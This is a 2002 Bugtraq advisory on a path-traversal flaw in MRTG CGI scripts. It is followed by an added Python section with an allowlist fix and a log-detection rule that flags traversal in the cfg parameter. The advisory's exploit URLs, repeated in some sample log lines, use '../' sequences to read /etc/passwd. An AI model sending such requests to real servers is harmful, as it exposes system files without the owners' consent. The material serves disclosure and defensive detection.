[24072] in bugtraq


new advisory

daemon@ATHENA.MIT.EDU (UkR-XblP?)
Sat Feb 2 12:03:09 2002

From: "UkR-XblP?" <cuctema@ok.ru>
To: BUGTRAQ@securityfocus.com
Date: Sat, 02 Feb 2002 04:47:29 +0300
Message-ID: <web-13380375@backend2.aha.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"; format="flowed"
Content-Transfer-Encoding: 8bit

                    ---=== UkR Security Team advisory ===---

Name          : MRTG CGI script "show files" vulnerability
About         : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic
                load on network links. MRTG generates HTML pages containing GIF
                images which provide a live visual representation of this traffic.
Product vendor: MRTG / http://www.mrtg.org
Problem       : The problem lies in incorrect validation of user-submitted
                (browser-supplied) information, which can reveal the first line of
                any file on the system where the script is installed.
Workaround    : this helps to some extent: $input =~ s/[(\.\.)|\/]//g;
Author        : UkR-XblP / UkR security team
Exploit       : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
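As an added example (not part of the advisory and not MRTG's or 14all.cgi's own code), the block below renders the fix for the cfg parameter in Python rather than the Perl of the affected scripts: an allowlist on the requested file name plus a containment check on the canonicalised path, alongside a Python rendering of the advisory's stripping workaround and a small detection rule run over constructed web-server log lines. The directory /var/www/mrtg/cfg, the function names and the log lines are assumptions made for this example. One caveat on the workaround: the Perl pattern [(\.\.)|\/] is a character class, so it deletes every individual '(', '.', ')', '|' and '/' character rather than the sequence '..'. That does stop traversal, but it also mangles legitimate names, which is why an allowlist is the better check.

```python
import os
import re
import urllib.parse

# Constructed for this example: the directory where MRTG config files are kept
# (the real location depends on the installation).
CFG_DIR = "/var/www/mrtg/cfg"

# Allowlist for the cfg parameter: a plain file name ending in .cfg that starts
# with a letter or digit and contains no path separators.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*\.cfg$")


def is_safe_name(value: str) -> bool:
    """True if value is an allowlisted file name with no '..' sequence."""
    return bool(SAFE_NAME.match(value)) and ".." not in value


def strip_workaround(value: str) -> str:
    """The advisory's Perl workaround rendered in Python.

    Because the Perl pattern is a character class, it removes every '(', '.',
    ')', '|' and '/' character, not the sequence '..'. Traversal is blocked as
    a side effect, but valid names lose their dots as well.
    """
    return re.sub(r"[().|/]", "", value)


def resolve_cfg(cfg_param: str, base_dir: str = CFG_DIR):
    """Return the absolute config path, or None if the request is rejected.

    Two checks: the allowlist on the raw parameter, then a containment check
    on the canonicalised path so that the result cannot leave base_dir.
    """
    if not is_safe_name(cfg_param):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, cfg_param))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed web-server log lines (Common Log Format), not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Feb/2002:04:47:29 +0300] "GET /cgi-bin/mrtg.cgi?cfg=router1.cfg HTTP/1.0" 200 4096',
    '10.0.0.9 - - [02/Feb/2002:04:48:01 +0300] "GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 200 512',
    '10.0.0.9 - - [02/Feb/2002:04:48:05 +0300] "GET /cgi-bin/traffic.cgi?cfg=..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 512',
    '10.0.0.7 - - [02/Feb/2002:04:49:10 +0300] "GET /index.html HTTP/1.0" 200 1024',
]

# Extracts the raw cfg value from the request line in a log entry.
CFG_PARAM = re.compile(r"[?&]cfg=([^&\s\"]+)")


def is_traversal_request(log_line: str) -> bool:
    """Detection rule: flag a request whose cfg value fails the allowlist.

    The value is percent-decoded first so that encoded slashes and dots are
    judged the same way as literal ones.
    """
    m = CFG_PARAM.search(log_line)
    if not m:
        return False
    value = urllib.parse.unquote(m.group(1))
    return not is_safe_name(value)


def flag_traversal(lines):
    """Return the log lines whose cfg value was rejected by the allowlist."""
    return [line for line in lines if is_traversal_request(line)]


if __name__ == "__main__":
    for line in flag_traversal(SAMPLE_LOG):
        print("suspicious:", line)
```

The same is_safe_name check serves both sides: the CGI script uses it to refuse the request before opening anything, and the log rule uses it to find requests that an unpatched script would have served.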
---
Professional hosting for everyone - http://www.host.ru
